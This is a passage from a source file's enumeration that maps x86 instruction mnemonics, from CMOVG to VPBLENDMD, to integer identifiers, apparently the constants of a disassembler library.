X86_INS_CMOVG = 79, X86_INS_CMOVGE = 80, X86_INS_CMOVL = 81, X86_INS_CMOVLE = 82, X86_INS_FCMOVNBE = 83, X86_INS_FCMOVNB = 84, X86_INS_CMOVNE = 85, X86_INS_FCMOVNE = 86, X86_INS_CMOVNO = 87, X86_INS_CMOVNP = 88, X86_INS_FCMOVNU = 89, X86_INS_CMOVNS = 90, X86_INS_CMOVO = 91, X86_INS_CMOVP = 92, X86_INS_FCMOVU = 93, X86_INS_CMOVS = 94, X86_INS_CMP = 95, X86_INS_CMPPD = 96, X86_INS_CMPPS = 97, X86_INS_CMPSB = 98, X86_INS_CMPSD = 99, X86_INS_CMPSQ = 100, X86_INS_CMPSS = 101, X86_INS_CMPSW = 102, X86_INS_CMPXCHG16B = 103, X86_INS_CMPXCHG = 104, X86_INS_CMPXCHG8B = 105, X86_INS_COMISD = 106, X86_INS_COMISS = 107, X86_INS_FCOMP = 108, X86_INS_FCOMPI = 109, X86_INS_FCOMI = 110, X86_INS_FCOM = 111, X86_INS_FCOS = 112, X86_INS_CPUID = 113, X86_INS_CQO = 114, X86_INS_CRC32 = 115, X86_INS_CVTDQ2PD = 116, X86_INS_CVTDQ2PS = 117, X86_INS_CVTPD2DQ = 118, X86_INS_CVTPD2PS = 119, X86_INS_CVTPS2DQ = 120, X86_INS_CVTPS2PD = 121, X86_INS_CVTSD2SI = 122, X86_INS_CVTSD2SS = 123, X86_INS_CVTSI2SD = 124, X86_INS_CVTSI2SS = 125, X86_INS_CVTSS2SD = 126, X86_INS_CVTSS2SI = 127, X86_INS_CVTTPD2DQ = 128, X86_INS_CVTTPS2DQ = 129, X86_INS_CVTTSD2SI = 130, X86_INS_CVTTSS2SI = 131, X86_INS_CWD = 132, X86_INS_CWDE = 133, X86_INS_DAA = 134, X86_INS_DAS = 135, X86_INS_DATA16 = 136, X86_INS_DEC = 137, X86_INS_DIV = 138, X86_INS_DIVPD = 139, X86_INS_DIVPS = 140, X86_INS_FDIVR = 141, X86_INS_FIDIVR = 142, X86_INS_FDIVRP = 143, X86_INS_DIVSD = 144, X86_INS_DIVSS = 145, X86_INS_FDIV = 146, X86_INS_FIDIV = 147, X86_INS_FDIVP = 148, X86_INS_DPPD = 149, X86_INS_DPPS = 150, X86_INS_RET = 151, X86_INS_ENCLS = 152, X86_INS_ENCLU = 153, X86_INS_ENTER = 154, X86_INS_EXTRACTPS = 155, X86_INS_EXTRQ = 156, X86_INS_F2XM1 = 157, X86_INS_LCALL = 158, X86_INS_LJMP = 159, X86_INS_FBLD = 160, X86_INS_FBSTP = 161, X86_INS_FCOMPP = 162, X86_INS_FDECSTP = 163, X86_INS_FEMMS = 164, X86_INS_FFREE = 165, X86_INS_FICOM = 166, X86_INS_FICOMP = 167, X86_INS_FINCSTP = 168, X86_INS_FLDCW = 169, X86_INS_FLDENV = 170, X86_INS_FLDL2E = 171, X86_INS_FLDL2T = 172, X86_INS_FLDLG2 = 173, X86_INS_FLDLN2 = 174, X86_INS_FLDPI = 175, X86_INS_FNCLEX = 176, X86_INS_FNINIT = 177, X86_INS_FNOP = 178, X86_INS_FNSTCW = 179, X86_INS_FNSTSW = 180, X86_INS_FPATAN = 181, X86_INS_FPREM = 182, X86_INS_FPREM1 = 183, X86_INS_FPTAN = 184, X86_INS_FFREEP = 185, X86_INS_FRNDINT = 186, X86_INS_FRSTOR = 187, X86_INS_FNSAVE = 188, X86_INS_FSCALE = 189, X86_INS_FSETPM = 190, X86_INS_FSINCOS = 191, X86_INS_FNSTENV = 192, X86_INS_FXAM = 193, X86_INS_FXRSTOR = 194, X86_INS_FXRSTOR64 = 195, X86_INS_FXSAVE = 196, X86_INS_FXSAVE64 = 197, X86_INS_FXTRACT = 198, X86_INS_FYL2X = 199, X86_INS_FYL2XP1 = 200, X86_INS_MOVAPD = 201, X86_INS_MOVAPS = 202, X86_INS_ORPD = 203, X86_INS_ORPS = 204, X86_INS_VMOVAPD = 205, X86_INS_VMOVAPS = 206, X86_INS_XORPD = 207, X86_INS_XORPS = 208, X86_INS_GETSEC = 209, X86_INS_HADDPD = 210, X86_INS_HADDPS = 211, X86_INS_HLT = 212, X86_INS_HSUBPD = 213, X86_INS_HSUBPS = 214, X86_INS_IDIV = 215, X86_INS_FILD = 216, X86_INS_IMUL = 217, X86_INS_IN = 218, X86_INS_INC = 219, X86_INS_INSB = 220, X86_INS_INSERTPS = 221, X86_INS_INSERTQ = 222, X86_INS_INSD = 223, X86_INS_INSW = 224, X86_INS_INT = 225, X86_INS_INT1 = 226, X86_INS_INT3 = 227, X86_INS_INTO = 228, X86_INS_INVD = 229, X86_INS_INVEPT = 230, X86_INS_INVLPG = 231, X86_INS_INVLPGA = 232, X86_INS_INVPCID = 233, X86_INS_INVVPID = 234, X86_INS_IRET = 235, X86_INS_IRETD = 236, X86_INS_IRETQ = 237, X86_INS_FISTTP = 238, X86_INS_FIST = 239, X86_INS_FISTP = 240, X86_INS_UCOMISD = 241, X86_INS_UCOMISS = 242, X86_INS_VCOMISD = 243, X86_INS_VCOMISS = 244, X86_INS_VCVTSD2SS = 245, X86_INS_VCVTSI2SD = 246, X86_INS_VCVTSI2SS = 247, X86_INS_VCVTSS2SD = 248, X86_INS_VCVTTSD2SI = 249, X86_INS_VCVTTSD2USI = 250, X86_INS_VCVTTSS2SI = 251, X86_INS_VCVTTSS2USI = 252, X86_INS_VCVTUSI2SD = 253, X86_INS_VCVTUSI2SS = 254, X86_INS_VUCOMISD = 255, X86_INS_VUCOMISS = 256, X86_INS_JAE = 257, X86_INS_JA = 258, X86_INS_JBE = 259, X86_INS_JB = 260, X86_INS_JCXZ = 261, X86_INS_JECXZ = 262, X86_INS_JE = 263, X86_INS_JGE = 264, X86_INS_JG = 265, X86_INS_JLE = 266, X86_INS_JL = 267, X86_INS_JMP = 268, X86_INS_JNE = 269, X86_INS_JNO = 270, X86_INS_JNP = 271, X86_INS_JNS = 272, X86_INS_JO = 273, X86_INS_JP = 274, X86_INS_JRCXZ = 275, X86_INS_JS = 276, X86_INS_KANDB = 277, X86_INS_KANDD = 278, X86_INS_KANDNB = 279, X86_INS_KANDND = 280, X86_INS_KANDNQ = 281, X86_INS_KANDNW = 282, X86_INS_KANDQ = 283, X86_INS_KANDW = 284, X86_INS_KMOVB = 285, X86_INS_KMOVD = 286, X86_INS_KMOVQ = 287, X86_INS_KMOVW = 288, X86_INS_KNOTB = 289, X86_INS_KNOTD = 290, X86_INS_KNOTQ = 291, X86_INS_KNOTW = 292, X86_INS_KORB = 293, X86_INS_KORD = 294, X86_INS_KORQ = 295, X86_INS_KORTESTB = 296, X86_INS_KORTESTD = 297, X86_INS_KORTESTQ = 298, X86_INS_KORTESTW = 299, X86_INS_KORW = 300, X86_INS_KSHIFTLB = 301, X86_INS_KSHIFTLD = 302, X86_INS_KSHIFTLQ = 303, X86_INS_KSHIFTLW = 304, X86_INS_KSHIFTRB = 305, X86_INS_KSHIFTRD = 306, X86_INS_KSHIFTRQ = 307, X86_INS_KSHIFTRW = 308, X86_INS_KUNPCKBW = 309, X86_INS_KXNORB = 310, X86_INS_KXNORD = 311, X86_INS_KXNORQ = 312, X86_INS_KXNORW = 313, X86_INS_KXORB = 314, X86_INS_KXORD = 315, X86_INS_KXORQ = 316, X86_INS_KXORW = 317, X86_INS_LAHF = 318, X86_INS_LAR = 319, X86_INS_LDDQU = 320, X86_INS_LDMXCSR = 321, X86_INS_LDS = 322, X86_INS_FLDZ = 323, X86_INS_FLD1 = 324, X86_INS_FLD = 325, X86_INS_LEA = 326, X86_INS_LEAVE = 327, X86_INS_LES = 328, X86_INS_LFENCE = 329, X86_INS_LFS = 330, X86_INS_LGDT = 331, X86_INS_LGS = 332, X86_INS_LIDT = 333, X86_INS_LLDT = 334, X86_INS_LMSW = 335, X86_INS_OR = 336, X86_INS_SUB = 337, X86_INS_XOR = 338, X86_INS_LODSB = 339, X86_INS_LODSD = 340, X86_INS_LODSQ = 341, X86_INS_LODSW = 342, X86_INS_LOOP = 343, X86_INS_LOOPE = 344, X86_INS_LOOPNE = 345, X86_INS_RETF = 346, X86_INS_RETFQ = 347, X86_INS_LSL = 348, X86_INS_LSS = 349, X86_INS_LTR = 350, X86_INS_XADD = 351, X86_INS_LZCNT = 352, X86_INS_MASKMOVDQU = 353, X86_INS_MAXPD = 354, X86_INS_MAXPS = 355, X86_INS_MAXSD = 356, X86_INS_MAXSS = 357, X86_INS_MFENCE = 358, X86_INS_MINPD = 359, X86_INS_MINPS = 360, X86_INS_MINSD = 361, X86_INS_MINSS = 362, X86_INS_CVTPD2PI = 363, X86_INS_CVTPI2PD = 364, X86_INS_CVTPI2PS = 365, X86_INS_CVTPS2PI = 366, X86_INS_CVTTPD2PI = 367, X86_INS_CVTTPS2PI = 368, X86_INS_EMMS = 369, X86_INS_MASKMOVQ = 370, X86_INS_MOVD = 371, X86_INS_MOVDQ2Q = 372, X86_INS_MOVNTQ = 373, X86_INS_MOVQ2DQ = 374, X86_INS_MOVQ = 375, X86_INS_PABSB = 376, X86_INS_PABSD = 377, X86_INS_PABSW = 378, X86_INS_PACKSSDW = 379, X86_INS_PACKSSWB = 380, X86_INS_PACKUSWB = 381, X86_INS_PADDB = 382, X86_INS_PADDD = 383, X86_INS_PADDQ = 384, X86_INS_PADDSB = 385, X86_INS_PADDSW = 386, X86_INS_PADDUSB = 387, X86_INS_PADDUSW = 388, X86_INS_PADDW = 389, X86_INS_PALIGNR = 390, X86_INS_PANDN = 391, X86_INS_PAND = 392, X86_INS_PAVGB = 393, X86_INS_PAVGW = 394, X86_INS_PCMPEQB = 395, X86_INS_PCMPEQD = 396, X86_INS_PCMPEQW = 397, X86_INS_PCMPGTB = 398, X86_INS_PCMPGTD = 399, X86_INS_PCMPGTW = 400, X86_INS_PEXTRW = 401, X86_INS_PHADDSW = 402, X86_INS_PHADDW = 403, X86_INS_PHADDD = 404, X86_INS_PHSUBD = 405, X86_INS_PHSUBSW = 406, X86_INS_PHSUBW = 407, X86_INS_PINSRW = 408, X86_INS_PMADDUBSW = 409, X86_INS_PMADDWD = 410, X86_INS_PMAXSW = 411, X86_INS_PMAXUB = 412, X86_INS_PMINSW = 413, X86_INS_PMINUB = 414, X86_INS_PMOVMSKB = 415, X86_INS_PMULHRSW = 416, X86_INS_PMULHUW = 417, X86_INS_PMULHW = 418, X86_INS_PMULLW = 419, X86_INS_PMULUDQ = 420, X86_INS_POR = 421, X86_INS_PSADBW = 422, X86_INS_PSHUFB = 423, X86_INS_PSHUFW = 424, X86_INS_PSIGNB = 425, X86_INS_PSIGND = 426, X86_INS_PSIGNW = 427, X86_INS_PSLLD = 428, X86_INS_PSLLQ = 429, X86_INS_PSLLW = 430, X86_INS_PSRAD = 431, X86_INS_PSRAW = 432, X86_INS_PSRLD = 433, X86_INS_PSRLQ = 434, X86_INS_PSRLW = 435, X86_INS_PSUBB = 436, X86_INS_PSUBD = 437, X86_INS_PSUBQ = 438, X86_INS_PSUBSB = 439, X86_INS_PSUBSW = 440, X86_INS_PSUBUSB = 441, X86_INS_PSUBUSW = 442, X86_INS_PSUBW = 443, X86_INS_PUNPCKHBW = 444, X86_INS_PUNPCKHDQ = 445, X86_INS_PUNPCKHWD = 446, X86_INS_PUNPCKLBW = 447, X86_INS_PUNPCKLDQ = 448, X86_INS_PUNPCKLWD = 449, X86_INS_PXOR = 450, X86_INS_MONITOR = 451, X86_INS_MONTMUL = 452, X86_INS_MOV = 453, X86_INS_MOVABS = 454, X86_INS_MOVBE = 455, X86_INS_MOVDDUP = 456, X86_INS_MOVDQA = 457, X86_INS_MOVDQU = 458, X86_INS_MOVHLPS = 459, X86_INS_MOVHPD = 460, X86_INS_MOVHPS = 461, X86_INS_MOVLHPS = 462, X86_INS_MOVLPD = 463, X86_INS_MOVLPS = 464, X86_INS_MOVMSKPD = 465, X86_INS_MOVMSKPS = 466, X86_INS_MOVNTDQA = 467, X86_INS_MOVNTDQ = 468, X86_INS_MOVNTI = 469, X86_INS_MOVNTPD = 470, X86_INS_MOVNTPS = 471, X86_INS_MOVNTSD = 472, X86_INS_MOVNTSS = 473, X86_INS_MOVSB = 474, X86_INS_MOVSD = 475, X86_INS_MOVSHDUP = 476, X86_INS_MOVSLDUP = 477, X86_INS_MOVSQ = 478, X86_INS_MOVSS = 479, X86_INS_MOVSW = 480, X86_INS_MOVSX = 481, X86_INS_MOVSXD = 482, X86_INS_MOVUPD = 483, X86_INS_MOVUPS = 484, X86_INS_MOVZX = 485, X86_INS_MPSADBW = 486, X86_INS_MUL = 487, X86_INS_MULPD = 488, X86_INS_MULPS = 489, X86_INS_MULSD = 490, X86_INS_MULSS = 491, X86_INS_MULX = 492, X86_INS_FMUL = 493, X86_INS_FIMUL = 494, X86_INS_FMULP = 495, X86_INS_MWAIT = 496, X86_INS_NEG = 497, X86_INS_NOP = 498, X86_INS_NOT = 499, X86_INS_OUT = 500, X86_INS_OUTSB = 501, X86_INS_OUTSD = 502, X86_INS_OUTSW = 503, X86_INS_PACKUSDW = 504, X86_INS_PAUSE = 505, X86_INS_PAVGUSB = 506, X86_INS_PBLENDVB = 507, X86_INS_PBLENDW = 508, X86_INS_PCLMULQDQ = 509, X86_INS_PCMPEQQ = 510, X86_INS_PCMPESTRI = 511, X86_INS_PCMPESTRM = 512, X86_INS_PCMPGTQ = 513, X86_INS_PCMPISTRI = 514, X86_INS_PCMPISTRM = 515, X86_INS_PCOMMIT = 516, X86_INS_PDEP = 517, X86_INS_PEXT = 518, X86_INS_PEXTRB = 519, X86_INS_PEXTRD = 520, X86_INS_PEXTRQ = 521, X86_INS_PF2ID = 522, X86_INS_PF2IW = 523, X86_INS_PFACC = 524, X86_INS_PFADD = 525, X86_INS_PFCMPEQ = 526, X86_INS_PFCMPGE = 527, X86_INS_PFCMPGT = 528, X86_INS_PFMAX = 529, X86_INS_PFMIN = 530, X86_INS_PFMUL = 531, X86_INS_PFNACC = 532, X86_INS_PFPNACC = 533, X86_INS_PFRCPIT1 = 534, X86_INS_PFRCPIT2 = 535, X86_INS_PFRCP = 536, X86_INS_PFRSQIT1 = 537, X86_INS_PFRSQRT = 538, X86_INS_PFSUBR = 539, X86_INS_PFSUB = 540, X86_INS_PHMINPOSUW = 541, X86_INS_PI2FD = 542, X86_INS_PI2FW = 543, X86_INS_PINSRB = 544, X86_INS_PINSRD = 545, X86_INS_PINSRQ = 546, X86_INS_PMAXSB = 547, X86_INS_PMAXSD = 548, X86_INS_PMAXUD = 549, X86_INS_PMAXUW = 550, X86_INS_PMINSB = 551, X86_INS_PMINSD = 552, X86_INS_PMINUD = 553, X86_INS_PMINUW = 554, X86_INS_PMOVSXBD = 555, X86_INS_PMOVSXBQ = 556, X86_INS_PMOVSXBW = 557, X86_INS_PMOVSXDQ = 558, X86_INS_PMOVSXWD = 559, X86_INS_PMOVSXWQ = 560, X86_INS_PMOVZXBD = 561, X86_INS_PMOVZXBQ = 562, X86_INS_PMOVZXBW = 563, X86_INS_PMOVZXDQ = 564, X86_INS_PMOVZXWD = 565, X86_INS_PMOVZXWQ = 566, X86_INS_PMULDQ = 567, X86_INS_PMULHRW = 568, X86_INS_PMULLD = 569, X86_INS_POP = 570, X86_INS_POPAW = 571, X86_INS_POPAL = 572, X86_INS_POPCNT = 573, X86_INS_POPF = 574, X86_INS_POPFD = 575, X86_INS_POPFQ = 576, X86_INS_PREFETCH = 577, X86_INS_PREFETCHNTA = 578, X86_INS_PREFETCHT0 = 579, X86_INS_PREFETCHT1 = 580, X86_INS_PREFETCHT2 = 581, X86_INS_PREFETCHW = 582, X86_INS_PSHUFD = 583, X86_INS_PSHUFHW = 584, X86_INS_PSHUFLW = 585, X86_INS_PSLLDQ = 586, X86_INS_PSRLDQ = 587, X86_INS_PSWAPD = 588, X86_INS_PTEST = 589, X86_INS_PUNPCKHQDQ = 590, X86_INS_PUNPCKLQDQ = 591, X86_INS_PUSH = 592, X86_INS_PUSHAW = 593, X86_INS_PUSHAL = 594, X86_INS_PUSHF = 595, X86_INS_PUSHFD = 596, X86_INS_PUSHFQ = 597, X86_INS_RCL = 598, X86_INS_RCPPS = 599, X86_INS_RCPSS = 600, X86_INS_RCR = 601, X86_INS_RDFSBASE = 602, X86_INS_RDGSBASE = 603, X86_INS_RDMSR = 604, X86_INS_RDPMC = 605, X86_INS_RDRAND = 606, X86_INS_RDSEED = 607, X86_INS_RDTSC = 608, X86_INS_RDTSCP = 609, X86_INS_ROL = 610, X86_INS_ROR = 611, X86_INS_RORX = 612, X86_INS_ROUNDPD = 613, X86_INS_ROUNDPS = 614, X86_INS_ROUNDSD = 615, X86_INS_ROUNDSS = 616, X86_INS_RSM = 617, X86_INS_RSQRTPS = 618, X86_INS_RSQRTSS = 619, X86_INS_SAHF = 620, X86_INS_SAL = 621, X86_INS_SALC = 622, X86_INS_SAR = 623, X86_INS_SARX = 624, X86_INS_SBB = 625, X86_INS_SCASB = 626, X86_INS_SCASD = 627, X86_INS_SCASQ = 628, X86_INS_SCASW = 629, X86_INS_SETAE = 630, X86_INS_SETA = 631, X86_INS_SETBE = 632, X86_INS_SETB = 633, X86_INS_SETE = 634, X86_INS_SETGE = 635, X86_INS_SETG = 636, X86_INS_SETLE = 637, X86_INS_SETL = 638, X86_INS_SETNE = 639, X86_INS_SETNO = 640, X86_INS_SETNP = 641, X86_INS_SETNS = 642, X86_INS_SETO = 643, X86_INS_SETP = 644, X86_INS_SETS = 645, X86_INS_SFENCE = 646, X86_INS_SGDT = 647, X86_INS_SHA1MSG1 = 648, X86_INS_SHA1MSG2 = 649, X86_INS_SHA1NEXTE = 650, X86_INS_SHA1RNDS4 = 651, X86_INS_SHA256MSG1 = 652, X86_INS_SHA256MSG2 = 653, X86_INS_SHA256RNDS2 = 654, X86_INS_SHL = 655, X86_INS_SHLD = 656, X86_INS_SHLX = 657, X86_INS_SHR = 658, X86_INS_SHRD = 659, X86_INS_SHRX = 660, X86_INS_SHUFPD = 661, X86_INS_SHUFPS = 662, X86_INS_SIDT = 663, X86_INS_FSIN = 664, X86_INS_SKINIT = 665, X86_INS_SLDT = 666, X86_INS_SMSW = 667, X86_INS_SQRTPD = 668, X86_INS_SQRTPS = 669, X86_INS_SQRTSD = 670, X86_INS_SQRTSS = 671, X86_INS_FSQRT = 672, X86_INS_STAC = 673, X86_INS_STC = 674, X86_INS_STD = 675, X86_INS_STGI = 676, X86_INS_STI = 677, X86_INS_STMXCSR = 678, X86_INS_STOSB = 679, X86_INS_STOSD = 680, X86_INS_STOSQ = 681, X86_INS_STOSW = 682, X86_INS_STR = 683, X86_INS_FST = 684, X86_INS_FSTP = 685, X86_INS_FSTPNCE = 686, X86_INS_FXCH = 687, X86_INS_SUBPD = 688, X86_INS_SUBPS = 689, X86_INS_FSUBR = 690, X86_INS_FISUBR = 691, X86_INS_FSUBRP = 692, X86_INS_SUBSD = 693, X86_INS_SUBSS = 694, X86_INS_FSUB = 695, X86_INS_FISUB = 696, X86_INS_FSUBP = 697, X86_INS_SWAPGS = 698, X86_INS_SYSCALL = 699, X86_INS_SYSENTER = 700, X86_INS_SYSEXIT = 701, X86_INS_SYSRET = 702, X86_INS_T1MSKC = 703, X86_INS_TEST = 704, X86_INS_UD2 = 705, X86_INS_FTST = 706, X86_INS_TZCNT = 707, X86_INS_TZMSK = 708, X86_INS_FUCOMPI = 709, X86_INS_FUCOMI = 710, X86_INS_FUCOMPP = 711, X86_INS_FUCOMP = 712, X86_INS_FUCOM = 713, X86_INS_UD2B = 714, X86_INS_UNPCKHPD = 715, X86_INS_UNPCKHPS = 716, X86_INS_UNPCKLPD = 717, X86_INS_UNPCKLPS = 718, X86_INS_VADDPD = 719, X86_INS_VADDPS = 720, X86_INS_VADDSD = 721, X86_INS_VADDSS = 722, X86_INS_VADDSUBPD = 723, X86_INS_VADDSUBPS = 724, X86_INS_VAESDECLAST = 725, X86_INS_VAESDEC = 726, X86_INS_VAESENCLAST = 727, X86_INS_VAESENC = 728, X86_INS_VAESIMC = 729, X86_INS_VAESKEYGENASSIST = 730, X86_INS_VALIGND = 731, X86_INS_VALIGNQ = 732, X86_INS_VANDNPD = 733, X86_INS_VANDNPS = 734, X86_INS_VANDPD = 735, X86_INS_VANDPS = 736, X86_INS_VBLENDMPD = 737, X86_INS_VBLENDMPS = 738, X86_INS_VBLENDPD = 739, X86_INS_VBLENDPS = 740, X86_INS_VBLENDVPD = 741, X86_INS_VBLENDVPS = 742, X86_INS_VBROADCASTF128 = 743, X86_INS_VBROADCASTI32X4 = 744, X86_INS_VBROADCASTI64X4 = 745, X86_INS_VBROADCASTSD = 746, X86_INS_VBROADCASTSS = 747, X86_INS_VCMPPD = 748, X86_INS_VCMPPS = 749, X86_INS_VCMPSD = 750, X86_INS_VCMPSS = 751, X86_INS_VCOMPRESSPD = 752, X86_INS_VCOMPRESSPS = 753, X86_INS_VCVTDQ2PD = 754, X86_INS_VCVTDQ2PS = 755, X86_INS_VCVTPD2DQX = 756, X86_INS_VCVTPD2DQ = 757, X86_INS_VCVTPD2PSX = 758, X86_INS_VCVTPD2PS = 759, X86_INS_VCVTPD2UDQ = 760, X86_INS_VCVTPH2PS = 761, X86_INS_VCVTPS2DQ = 762, X86_INS_VCVTPS2PD = 763, X86_INS_VCVTPS2PH = 764, X86_INS_VCVTPS2UDQ = 765, X86_INS_VCVTSD2SI = 766, X86_INS_VCVTSD2USI = 767, X86_INS_VCVTSS2SI = 768, X86_INS_VCVTSS2USI = 769, X86_INS_VCVTTPD2DQX = 770, X86_INS_VCVTTPD2DQ = 771, X86_INS_VCVTTPD2UDQ = 772, X86_INS_VCVTTPS2DQ = 773, X86_INS_VCVTTPS2UDQ = 774, X86_INS_VCVTUDQ2PD = 775, X86_INS_VCVTUDQ2PS = 776, X86_INS_VDIVPD = 777, X86_INS_VDIVPS = 778, X86_INS_VDIVSD = 779, X86_INS_VDIVSS = 780, X86_INS_VDPPD = 781, X86_INS_VDPPS = 782, X86_INS_VERR = 783, X86_INS_VERW = 784, X86_INS_VEXP2PD = 785, X86_INS_VEXP2PS = 786, X86_INS_VEXPANDPD = 787, X86_INS_VEXPANDPS = 788, X86_INS_VEXTRACTF128 = 789, X86_INS_VEXTRACTF32X4 = 790, X86_INS_VEXTRACTF64X4 = 791, X86_INS_VEXTRACTI128 = 792, X86_INS_VEXTRACTI32X4 = 793, X86_INS_VEXTRACTI64X4 = 794, X86_INS_VEXTRACTPS = 795, X86_INS_VFMADD132PD = 796, X86_INS_VFMADD132PS = 797, X86_INS_VFMADDPD = 798, X86_INS_VFMADD213PD = 799, X86_INS_VFMADD231PD = 800, X86_INS_VFMADDPS = 801, X86_INS_VFMADD213PS = 802, X86_INS_VFMADD231PS = 803, X86_INS_VFMADDSD = 804, X86_INS_VFMADD213SD = 805, X86_INS_VFMADD132SD = 806, X86_INS_VFMADD231SD = 807, X86_INS_VFMADDSS = 808, X86_INS_VFMADD213SS = 809, X86_INS_VFMADD132SS = 810, X86_INS_VFMADD231SS = 811, X86_INS_VFMADDSUB132PD = 812, X86_INS_VFMADDSUB132PS = 813, X86_INS_VFMADDSUBPD = 814, X86_INS_VFMADDSUB213PD = 815, X86_INS_VFMADDSUB231PD = 816, X86_INS_VFMADDSUBPS = 817, X86_INS_VFMADDSUB213PS = 818, X86_INS_VFMADDSUB231PS = 819, X86_INS_VFMSUB132PD = 820, X86_INS_VFMSUB132PS = 821, X86_INS_VFMSUBADD132PD = 822, X86_INS_VFMSUBADD132PS = 823, X86_INS_VFMSUBADDPD = 824, X86_INS_VFMSUBADD213PD = 825, X86_INS_VFMSUBADD231PD = 826, X86_INS_VFMSUBADDPS = 827, X86_INS_VFMSUBADD213PS = 828, X86_INS_VFMSUBADD231PS = 829, X86_INS_VFMSUBPD = 830, X86_INS_VFMSUB213PD = 831, X86_INS_VFMSUB231PD = 832, X86_INS_VFMSUBPS = 833, X86_INS_VFMSUB213PS = 834, X86_INS_VFMSUB231PS = 835, X86_INS_VFMSUBSD = 836, X86_INS_VFMSUB213SD = 837, X86_INS_VFMSUB132SD = 838, X86_INS_VFMSUB231SD = 839, X86_INS_VFMSUBSS = 840, X86_INS_VFMSUB213SS = 841, X86_INS_VFMSUB132SS = 842, X86_INS_VFMSUB231SS = 843, X86_INS_VFNMADD132PD = 844, X86_INS_VFNMADD132PS = 845, X86_INS_VFNMADDPD = 846, X86_INS_VFNMADD213PD = 847, X86_INS_VFNMADD231PD = 848, X86_INS_VFNMADDPS = 849, X86_INS_VFNMADD213PS = 850, X86_INS_VFNMADD231PS = 851, X86_INS_VFNMADDSD = 852, X86_INS_VFNMADD213SD = 853, X86_INS_VFNMADD132SD = 854, X86_INS_VFNMADD231SD = 855, X86_INS_VFNMADDSS = 856, X86_INS_VFNMADD213SS = 857, X86_INS_VFNMADD132SS = 858, X86_INS_VFNMADD231SS = 859, X86_INS_VFNMSUB132PD = 860, X86_INS_VFNMSUB132PS = 861, X86_INS_VFNMSUBPD = 862, X86_INS_VFNMSUB213PD = 863, X86_INS_VFNMSUB231PD = 864, X86_INS_VFNMSUBPS = 865, X86_INS_VFNMSUB213PS = 866, X86_INS_VFNMSUB231PS = 867, X86_INS_VFNMSUBSD = 868, X86_INS_VFNMSUB213SD = 869, X86_INS_VFNMSUB132SD = 870, X86_INS_VFNMSUB231SD = 871, X86_INS_VFNMSUBSS = 872, X86_INS_VFNMSUB213SS = 873, X86_INS_VFNMSUB132SS = 874, X86_INS_VFNMSUB231SS = 875, X86_INS_VFRCZPD = 876, X86_INS_VFRCZPS = 877, X86_INS_VFRCZSD = 878, X86_INS_VFRCZSS = 879, X86_INS_VORPD = 880, X86_INS_VORPS = 881, X86_INS_VXORPD = 882, X86_INS_VXORPS = 883, X86_INS_VGATHERDPD = 884, X86_INS_VGATHERDPS = 885, X86_INS_VGATHERPF0DPD = 886, X86_INS_VGATHERPF0DPS = 887, X86_INS_VGATHERPF0QPD = 888, X86_INS_VGATHERPF0QPS = 889, X86_INS_VGATHERPF1DPD = 890, X86_INS_VGATHERPF1DPS = 891, X86_INS_VGATHERPF1QPD = 892, X86_INS_VGATHERPF1QPS = 893, X86_INS_VGATHERQPD = 894, X86_INS_VGATHERQPS = 895, X86_INS_VHADDPD = 896, X86_INS_VHADDPS = 897, X86_INS_VHSUBPD = 898, X86_INS_VHSUBPS = 899, X86_INS_VINSERTF128 = 900, X86_INS_VINSERTF32X4 = 901, X86_INS_VINSERTF32X8 = 902, X86_INS_VINSERTF64X2 = 903, X86_INS_VINSERTF64X4 = 904, X86_INS_VINSERTI128 = 905, X86_INS_VINSERTI32X4 = 906, X86_INS_VINSERTI32X8 = 907, X86_INS_VINSERTI64X2 = 908, X86_INS_VINSERTI64X4 = 909, X86_INS_VINSERTPS = 910, X86_INS_VLDDQU = 911, X86_INS_VLDMXCSR = 912, X86_INS_VMASKMOVDQU = 913, X86_INS_VMASKMOVPD = 914, X86_INS_VMASKMOVPS = 915, X86_INS_VMAXPD = 916, X86_INS_VMAXPS = 917, X86_INS_VMAXSD = 918, X86_INS_VMAXSS = 919, X86_INS_VMCALL = 920, X86_INS_VMCLEAR = 921, X86_INS_VMFUNC = 922, X86_INS_VMINPD = 923, X86_INS_VMINPS = 924, X86_INS_VMINSD = 925, X86_INS_VMINSS = 926, X86_INS_VMLAUNCH = 927, X86_INS_VMLOAD = 928, X86_INS_VMMCALL = 929, X86_INS_VMOVQ = 930, X86_INS_VMOVDDUP = 931, X86_INS_VMOVD = 932, X86_INS_VMOVDQA32 = 933, X86_INS_VMOVDQA64 = 934, X86_INS_VMOVDQA = 935, X86_INS_VMOVDQU16 = 936, X86_INS_VMOVDQU32 = 937, X86_INS_VMOVDQU64 = 938, X86_INS_VMOVDQU8 = 939, X86_INS_VMOVDQU = 940, X86_INS_VMOVHLPS = 941, X86_INS_VMOVHPD = 942, X86_INS_VMOVHPS = 943, X86_INS_VMOVLHPS = 944, X86_INS_VMOVLPD = 945, X86_INS_VMOVLPS = 946, X86_INS_VMOVMSKPD = 947, X86_INS_VMOVMSKPS = 948, X86_INS_VMOVNTDQA = 949, X86_INS_VMOVNTDQ = 950, X86_INS_VMOVNTPD = 951, X86_INS_VMOVNTPS = 952, X86_INS_VMOVSD = 953, X86_INS_VMOVSHDUP = 954, X86_INS_VMOVSLDUP = 955, X86_INS_VMOVSS = 956, X86_INS_VMOVUPD = 957, X86_INS_VMOVUPS = 958, X86_INS_VMPSADBW = 959, X86_INS_VMPTRLD = 960, X86_INS_VMPTRST = 961, X86_INS_VMREAD = 962, X86_INS_VMRESUME = 963, X86_INS_VMRUN = 964, X86_INS_VMSAVE = 965, X86_INS_VMULPD = 966, X86_INS_VMULPS = 967, X86_INS_VMULSD = 968, X86_INS_VMULSS = 969, X86_INS_VMWRITE = 970, X86_INS_VMXOFF = 971, X86_INS_VMXON = 972, X86_INS_VPABSB = 973, X86_INS_VPABSD = 974, X86_INS_VPABSQ = 975, X86_INS_VPABSW = 976, X86_INS_VPACKSSDW = 977, X86_INS_VPACKSSWB = 978, X86_INS_VPACKUSDW = 979, X86_INS_VPACKUSWB = 980, X86_INS_VPADDB = 981, X86_INS_VPADDD = 982, X86_INS_VPADDQ = 983, X86_INS_VPADDSB = 984, X86_INS_VPADDSW = 985, X86_INS_VPADDUSB = 986, X86_INS_VPADDUSW = 987, X86_INS_VPADDW = 988, X86_INS_VPALIGNR = 989, X86_INS_VPANDD = 990, X86_INS_VPANDND = 991, X86_INS_VPANDNQ = 992, X86_INS_VPANDN = 993, X86_INS_VPANDQ = 994, X86_INS_VPAND = 995, X86_INS_VPAVGB = 996, X86_INS_VPAVGW = 997, X86_INS_VPBLENDD = 998, X86_INS_VPBLENDMB = 999, X86_INS_VPBLENDMD = 